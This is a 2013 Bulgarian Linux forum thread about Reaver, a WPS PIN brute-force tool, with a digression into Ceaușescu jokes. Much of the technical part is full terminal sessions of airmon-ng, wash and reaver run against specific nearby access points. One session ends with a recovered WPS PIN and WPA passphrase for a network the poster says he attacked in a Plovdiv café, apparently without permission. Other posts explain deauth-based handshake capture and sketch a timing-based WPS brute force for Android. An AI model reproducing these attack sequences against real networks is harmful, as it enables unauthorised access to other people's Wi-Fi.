Linux за българи: Форуми

Хумор, сатира и забава => Живота, вселената и някакви други глупости => Темата е започната от: backtrack5r3 в Apr 12, 2013, 16:03



Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: backtrack5r3 в Apr 12, 2013, 16:03
REAVER e номер 1. До сега нямам засечка. :)

Отделих темата и, заради някои интересни offtopic постове, я сложих в „Живота, вселената...“. Ако се развие в друга посока, ще я преместим пак.
bop_bop_mara


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 13, 2013, 06:58
REAVER e номер 1. До сега нямам засечка. :)
Това са пълни глупости...


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 13, 2013, 12:05
Reaver няма отношение към темата, тъй като се занимава с друг проблем. Иначе можеш да го пробваш срещу домашния ми рутер (старичък Linksys WRT54GL). Там ще даде засечка, тъй като въпросният не подържа WPS въобще :)


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 13, 2013, 12:52
Ама и той и нов да е ,като се заключи WPS ,ще го свали когато падне таванът на лятното кино...Рийвър не е панацея и той е зависим от определени фактори ,така както еъркрака.


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 18, 2013, 12:15
Цитат
публикувано от ApucTokpaT
Ама и той и нов да е ,като се заключи WPS ,ще го свали когато падне таванът на лятното кино...Рийвър не е панацея и той е зависим от определени фактори ,така както еъркрака.
Напълно си прав,това е някакъв бъг,който reaver има,независимо от версията.Пробвах като стартирам raver и като заключи WPS,веднага стартирам от друг терминал aireplay-ng за handshake,въпреки че успявам да получа handshake,% не мърдат от 0,единствено трика е да се рестартира рутера,но поне аз не знам досега да може рестартира рутер дистанционно.


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 18, 2013, 15:33
:) :) :)

Това ми напомня на онази книжка за тайните дневници на Елена Чаушеску. Дори точния абзац изрових от нета. Там става въпрос че другарката развива "научна" дейност в румънската академия на науките. Там се занимава с важни експерименти от сорта на:

Цитат
...Най-трудно беше да се фиксират електродите върху краката на мухата. След това всичко стана ясно. Аз извиках: "Скочи!", а Шимиеску включи тока. И ето че мухата скочи! След това отрязахме наполовина краката й, преди да повторим същата операция. Мухата отказа да се подчини. Аз и Шимиеску направихме извода, че когато се отрежат краката на една муха, тя оглушава


Титла: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: n00b в Apr 18, 2013, 15:57
:) :) :)

Това ми напомня на онази книжка за тайните дневници на Елена Чаушеску. Дори точния абзац изрових от нета. Там става въпрос че другарката развива "научна" дейност в румънската академия на науките. Там се занимава с важни експерименти от сорта на:

Цитат
...Най-трудно беше да се фиксират електродите върху краката на мухата. След това всичко стана ясно. Аз извиках: "Скочи!", а Шимиеску включи тока. И ето че мухата скочи! След това отрязахме наполовина краката й, преди да повторим същата операция. Мухата отказа да се подчини. Аз и Шимиеску направихме извода, че когато се отрежат краката на една муха, тя оглушава

И аз ги четох тези дневници... бях като гръмнат. След 10 години бях като 2 пъти повече гръмнат когато прочетох че били изфабрикувани от 2-ма френски журналисти.

PS: Това за мухата и аз си го спомням както и как варили деца да ги излекуват от грип.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: go_fire в Apr 18, 2013, 19:23
Какви са тия страхотии дето ги разправяте Ве хора?


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 19, 2013, 08:25
Е то няма как да е истина, просто е прекалено брутално. Това с надуването на плувкините да имали повече въздух или дето прокопаха канали под половин Букурещ за да следи синчето си какво прави. Ама имаше и доста забавни лафове от сорта на Елена като летяла над САЩ:  "хммм това ще се окаже по-голяма държава, отколкото мислех, голяма почти като Румъния".


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: nyakoy в Apr 19, 2013, 20:56
Като сте навълна "Чаушеску" еди виц и от мен:
Събрало се ЦК на РКП в Констанца и на сутринта Чаушеску отваря прозореца и се провиква "Буна диминяца, Сораеее" . В отговор се чува "Буна диминяца, Николаеее" . Помислил си той, че Господ му говори и  вика на следващата сутрин двама членове на ЦК и се провиква "Буна диминяца, Сораеее" и в отговор чува "Буна диминяцан Николае" . На третата сутрин привиква цялото ЦК и се провиква "Буна диминяца, Соарееее"   и в отговор чува "Пизда мъти, Николаеее"

Огнения да ви превежда.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: go_fire в Apr 20, 2013, 07:42
Буна е „добро“, доминяца вероятно е „утро“, сорае може би означава „народ“, някакъв порумънчен вариант на „хора“, една доста стара дума. Пизда е нецензурно, умалително име на първичен, женски, полов орган. Николае е малкото име на Чаушеско. За останалите думи ще трябва да питам, какво значат, но предполагам смисълът на вица е вече ясен.

Ще изкажа и още едно предположение, че въпросната партия, на която е събирал централният комитет, е вероятно КПР — комунистическата партия на Румъния.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: nyakoy в Apr 20, 2013, 17:26
Соаре значи слънце. В случая "мъти" спокойно може да се преведе като майна. Колкото до партията - беше БКП, а не КПБ. На техен си език може и да е било компартия на Румъния, но на нашенски езикът позволява друг словоред.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: go_fire в Apr 20, 2013, 17:52
А ха явно има някакви диалекти и при тях. Въпросният израз съм го чувал от тукашните власи като „пизда мата“. И май леко се обърках. Умалителното обръщение към половият белег май беше минджа, а това към възрастният представител. А Ве минали са бая годинки от как за последно ме ругаха на тоя език, та съм им позабравил „поздравленията“.

От другите, истинските поздрави помня само Буна сара, което е Добър вечер и то защото по онова време хит от мащаба на „Гандман стайл“ беше една песен „Бона сера“, което означава същото. Румънците имат наистина някакво основание да се наричат римняни (румънец това означава), защото съвсем очевидно езикът им е производен на италианският.

Словореда не е случаен. „Нашата“ партия е била единствената, която си е позволила да не спази словореда на КПСС и от това са имали страховити проблеми, но от уважение към Димитров ли, кой знае, сме се отървали без да ни натресат някоя касапница тип „пролетна“.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 21, 2013, 09:31
Цитат
публикувано от gat3way
Това ми напомня на онази книжка за тайните дневници на Елена Чаушеску. Дори точния абзац изрових от нета. Там става въпрос че другарката развива "научна" дейност в румънската академия на науките. Там се занимава с важни експерименти от сорта на
Не мога да проумея,на какво се дължи този сарказъм,или това е градивна критика подплътена солидно с доза английски хумор тип Джейн Остин "Гордост и Предразсъдъци" Gat3way ако има нещо да споделиш по темата ще се радвам да го чуя,но не по-този начин


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: go_fire в Apr 21, 2013, 09:41
anrydisappear ако не си разбрал, какво е искал да каже, а си заинтересован от това, ще е добре да попиташ културно, ако наистина искаш да получиш отговор. Иначе Гейта го е казал доста ясно.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 10:41
Цитат
Напълно си прав,това е някакъв бъг,който reaver има,независимо от версията.Пробвах като стартирам raver и като заключи WPS,веднага стартирам от друг терминал aireplay-ng за handshake,въпреки че успявам да получа handshake,% не мърдат от 0,единствено трика е да се рестартира рутера,но поне аз не знам досега да може рестартира рутер дистанционно.

Защото няма никаква връзка между двете. Това което правиш с Reaver е "активна" bruteforce атака върху WPS PIN-а на рутера. Тя налага да си в обхвата на рутера. Това което правиш с aircrack-ng е "пасивна" атака, опитваш се намериш passphrase-а, който "пасва" на предварително изслухтян authentication handshake, последното може да го правиш и на другия край на света. В пасивната атака може да има и "активен" елемент - реализиран от aireplay-ng, който се ползва за инжектиране на deauth фреймове в мрежата, което кара някой вече автентициран клиент да се разкачи с евентуалната надежда че ще се автентицира след това, ще му изслухтиш handshake-а и ще си го разбиваш на спокойствие.

Между двете обаче има много малко общо. Процентите не мърдат от 0%, просто защото WPS е изключен. Какво правиш в друг терминал с aireplay-ng няма никакво отношение към Reaver, deauth-ването на клиенти на мрежата по никакъв начин няма как да накара Reaver да заработи. Ако рестартираш рутера и Reaver изведнъж проработи отново, това означава единствено че настройката за забрана на WPS не е запазена поради някаква причина и след рестарта, WPS отново е разрешен.

Между другото, в момента си пиша едно app-че за андроид, което map-ва wifi рутери на една карта, ползвайки GPS-а за локация и опитвайки се да събере максимално много информация за рутерите, които "вижда" (android е малко крив в това отношение - колко информация ти се дава и колко не можеш да вземеш, защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората), обаче примерно дали се подържа WPS е елементарно да се разбере. Тествам си го, разхождайки се из София. Имам вече доста статистически наблюдения - потресаващо много рутери подържат WPS, вероятно над 80% от разните домашни рутери, които съм засичал, това е просто глупаво. Другият момент е колко рядко се използва EAP вместо PSK - досега съм виждал само 3 "локации" с EAP автентикация, вместо preshared key - единият е на Oriflame на 4-ти километър, другият е на някаква фирма близо до Ялта, третият беше до НДК, пак на някаква фирма. Предполагам в бизнеспарка ще има повече. Потресаващото е че на разни министерства, дори рутерите на народното събрание работят с PSK. Разбира се, "фирмените" и "правителствените" рутери много рядко имат WPS активиран от друга страна.

Хм, между другото не знам кой е инсталирал и настройвал 802.11 рутерите в Орифлейм, но трябва да си призная, че поне отстрани изглежда като най-професионалното нещо, което съм засичал досега в моите разходки-тестове досега. Личи си по детайлите - имат няколко рутера Cisco с EAP автентикация, един и същ SSID и в ESS режим, с включен preauthentication (за безпроблемно roam-ване между access point-овете) и подържат само и единствено CCMP, а не онези малоумни mixed TKIP+CCMP режими които едно време използваха заради това че Win XP не подържаше първоначално WPA2, а после - и те не знаят защо. Защо тая парфюмерия е инвестирала толкова усилия в wifi мрежата си за разлика от по-големи фирми или министерства примерно, където би трябвало най-малкото да държат повече на сигурността, не знам, засега е загадка :)


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 21, 2013, 11:40
Според мен са попаднали на човек ,който наистина разбира и е още не стъпил на пазара на услугите или не се е утвърдил,затова и може да е бил с по-достъпни цени
.Всъщност ривъва и еъкрака имат малко повече общо едно с друго ,това е пускането на мониторинг режима и използване на еъркрака,  като външна програма за  асоциация с мрежата (което не е задължително).Впрочем преди доста време ми се стори, че в документацията им мярках иструмент алфа версия още ,подобен на сегашния ривър...


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 11:56
Не съм сигурен дали въобще е необходимо картата да е в Monitor mode за целите на самото WPS брутфорсване - тъй като комуникацията е само unicast фреймове, които са предназначени за теб така или иначе. Разбира се за да знаеш какво ще хакваш там се налага да вкараш картата в monitor mode, най-малкото за да видиш какви мрежи има в обхвата и за да вземеш BSSID-а който ти трябва. На теория обаче би трябвало ако с iwconfig настроиш канала и SSID-а на мрежата, да можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver. Хм не знам, може би трябва да пробвам.

Апропо, ако това се окаже вярно, вероятно може да се реализира reaver-подобна атака и с андроид, въпреки че там ще е малко по-сложно, защото няма как да знаеш дали си получил NACK след пращане на първата половина от PIN-а или след пращането на втората. Предполагам обаче че може да сравниш времето за (не)успешно автентициране в мрежата и ако отнеме повече време, значи си уцелил първата част и е време за изтестване на втората. Това обаче е малко ненадеждно - защото различни фактори влияят на латентността и може да се окаже че е отнело повече време просто защото някой е затворил някой прозорец примерно. Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 21, 2013, 12:59
Здравей Gat3way,не искам да навлизам в бурни дебати относно reaver,но ...
Цитат
оргинално публикувано от Gat3way
Тя налага да си в обхвата на рутера
логично
Цитат
оргинално публикувано от Gat3way
Процентите не мърдат от 0%, просто защото WPS е изключен
Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv
Прилагам и обяснение от самият автор,ето линк  http://code.google.com/p/reaver-wps/wiki/FAQ ($2)  със особено внимание под надписа:
I get a warning "rate limiting detected", over and over again=lock wps
Относно reaver съм си правил доста експерменти,пробвал съм със всички опции но до ден дешен това с заключен wps,няма лек,Битуват разни мнения,че ако се стартират няколко вида атаки по 1 цел "рутер" рутера накрая се рестартира,оприличават го като атака със спам или sms bomb при който устройство се преторварва от исканите заявки,и се рестатира само с цел нормализиране на работата си.Преди време четох мисля че беше твое менение Gat3way,относно предаване и утройство на рутери,доколкото помня всичко беше основано на математика и на някакви случайни числа(дано да не бъркам,изпита по математика си го взимах като пълних бутилката с газ на преподавателката за моя сметка)тъй-като повечето софт(security testing) който е сътворен от девлоперите е основан на тази прословута математика,повтарям възможно да се рестартира рутера сам,но аз поне не съм го видял на живо.
Цитат
оргинално публикувано от Gat3way
защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората
Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки
Цитат
оргинално публикувано от Gat3way
Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна
Аз имам този софт близо година и половина на моят тел.(нокиа н900),давам ви пример какво представлява под н900:
~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # cd MyDocs/wl1251-maemo/binary/compat-wireless/
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit~ $ root
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]sleep: invalid number '1s'

(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
70:71:BC:1B:A4:02 1 -82 1.0 N 5f6abc
00:11:6B:47:58:2A 1 -90 1.0 N Webster
^C
Nokia-N900:~# reaver -i mon0 -b 70:71:BC:1B:A4:02 -d 0
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 70:71:BC:1B:A4:02
  • Associated with 70:71:BC:1B:A4:02 (ESSID: 5f6abc)
  • 0.01% complete @ 2012-02-29 11:38:56 {46 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:23 {73 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:53 {103 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:40:19 {129 second(s)/pin}
  • 90.91% complete @ 2012-02-29 11:41:03 {86 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:41:34 {51 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:42:02 {58 second(s)/pin}
  • 90.94% complete @ 2012-02-29 11:42:32 {52 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:42:57 {47 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:43:28 {45 second(s)/pin}
  • WPS PIN: '12345670'
  • WPA PSK: '227490756'
  • AP SSID: '5f6abc'
Nokia-N900:~#

Атаката е направих,в Пловдив в кафето до ПУ,не помня как се казваше но беше на 2 етажа
Цитат
оргинално публикувано от Gat3way
можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver
Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма



Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 14:54
Цитат
Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на

Това не е вярно. WPS е просто механизъм за автентикация и няма общо с това да се вижда ли или да не се вижда. Wifi точките се виждат, защото периодично "излъчват" т.нар "beacon frame" (офтопик, "скритите" не го излъчват). Примерно моят домашен рутер въобще не подържа WPS и по тази логика не би трябвало да се вижда. Когато изключиш WPS-а на рутера, съвсем спокойно ще си продължи да работи и да се вижда, просто WPS няма да работи. Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях).


Цитат
Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv

Причината е обяснена в документацията, към която си пратил линк. Забраняването на WPS по време на атаката апропо има същият ефект, по разбираеми причини - просто няма кой да ти "отговаря" повече. Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин.

Цитат
Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки

Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера.


Цитат
Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма

Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина :)



Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 21, 2013, 15:28
Код:
root@box-desktop:~# apt-get install reaver
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  reaver
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 236 kB of archives.
After this operation, 714 kB of additional disk space will be used.
Get:1 http://bg.archive.ubuntu.com/ubuntu/ quantal/universe reaver amd64 1.4-2 [236 kB]
Fetched 236 kB in 0s (336 kB/s)
Selecting previously unselected package reaver.
(Reading database ... 145607 files and directories currently installed.)
Unpacking reaver (from .../reaver_1.4-2_amd64.deb) ...
Processing triggers for man-db ...
Setting up reaver (1.4-2) ...
root@box-desktop:~# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: A0:F3:C1:37:D1:D8
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=67/70  Signal level=-43 dBm 
                    Encryption key:on
                    ESSID:"NIKOLACH"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000000012768d80
                    Extra: Last beacon: 248ms ago
                    IE: Unknown: 00084E494B4F4C414348
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 03010B
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : CCMP TKIP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00
                    IE: Unknown: DD1E00904C33CE111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 2D1ACE111BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: DD1A00904C340B071900000000000000000000000000000000000000
                    IE: Unknown: 3D160B071900000000000000000000000000000000000000
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD0A00037F04010000004000

По принцип излизат над 40 мрежи но тази е тестваната успешно с mon0....
Резултата с wlan0 интерфейс е нулев,за разлика от aircrack-ng ,с който спокойно можеш да взимаш handshake и с wlan0 и да сваляш wep (тествано от мен)
Код:
root@box-desktop:~# reaver -i wlan0 -b B0:48:7A:CE:79:D4 -c 11 -vv 

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 11
[+] Waiting for beacon from B0:48:7A:CE:79:D4
^C
[+] Nothing done, nothing to save.
root@box-desktop:~#


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 15:59
Жалко :(


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 21, 2013, 16:30
Цитат
оргинално публикувано от Gat3way
 Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях).
Да,това имах предвид
Цитат
оргинално публикувано от Gat3way
Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин
.
Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв
Цитат
оргинално публикувано от Gat3way
Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера
.
Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля
Цитат
оргинално публикувано от Gat3way
Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина
Няма как да пробвам от pc(сестра ми се бори на живот и смърт за нейният лаптоп,моят сдаде багажа сега се оглеждам за друг),а и колегата го е направил вече,но от тел.мога:

по твоят вариант:
BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ cd MyDocs/wl1251-maemo/binary/compat-wireless/
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
h
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0
BusyBox v1.21.0 (Debian 1.21.0power2) multi-call binary.

Usage: ps

Show list of processes

w Wide output
l Long output
T Show threads



Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
28:10:7B:ED:68:DC 11 -71 1.0 No su
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
^C
Nokia-N900:~# airmon-ng stop mon0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
mon0 TI WL1251 wl12xx - [phy0] (removed)

Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[-] Failed to initialize interface 'wlan0'
[-] Failed to recover WPA key

в monitor mode wlan0:
Nokia-N900:~# exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh unload
.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# ifconfig wlan0 down
Nokia-N900:~# iwconfig wlan0 mode Monitor
Nokia-N900:~# ifconfig wlan0 up
Nokia-N900:~# wash -i wlan0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
74:EA:3A:C5:A4:F4 9 -85 1.0 No TP-LINK_Blizoo
28:10:7B:ED:68:DC 11 -72 1.0 No su
00:11:6B:47:66:C6 11 -91 1.0 No WBR-6002
^C
Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 64:70:02:B6:51:08? [n/Y] n
  • Waiting for beacon from 64:70:02:B6:51:08
  • [!] WARNING: Failed to associate with 64:70:02:B6:51:08 (ESSID: Cvetarski magazin GULCHE)
    ^C
    това е нормално защото спрях wireless drivers

    без никакъв мониторинг режим,просто с super user:
    Nokia-N900:~# exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
    Root shell enabled


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
    h
    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    Nokia-N900:~# wash -i wlan0 -C -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[X] ERROR: Failed to open 'wlan0' for capturing
Nokia-N900:~#


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 16:48
Цитат
Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв

Ъммм, не, правят го някои, по-новите и по-хубавите де. Това обаче е лоша идея - единствено забавя лошите. Единственият начин да се отърве човек от тези глупости е просто да не ползва WPS.

Цитат
Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля

Може, стига да му се прати каквото трябва. Тук обаче не става въпрос за ioctl()-та за които kernel-а ще те бие през ръцете че не си root или пък просто не са имплементирани в драйвера. Това е дълга история обаче. Усилията които са положили хората са големи и е похвално че са го споделили. Това е проекта:

http://bryce-thomas.blogspot.com.au/2012/10/introducing-liber80211.html



Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 21, 2013, 17:54
Ммм ,тънък момент...
Код:
Nokia-N900:~# iwconfig wlan0 mode Monitor


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 21, 2013, 23:45
Хм, въпреки което не виждам защо трябва да е задължително да се чака за beacon в началото. Предполагам reaver го прави, защото няма друг начин да валидира че зададеното BSSID е истинско преди началото на атаката. Колкото повече мисля по въпроса, толкова по-убеден съм че е възможно да се реализира WPS bruteforce без да се налага да влизаш в monitor mode (невъзможно с android или поне не лесно). Алгоритъма, който ми се върти из главата е следния:

1) Итерирай първата половина от WPS кода (0000-9999), като за всеки опит смяташ времето t за опита.  Сметни средно-аритметичното t за всяка итерация.
2) Ако на поредния опит нямаш отклонение над някакъв threshold, върви на 1)
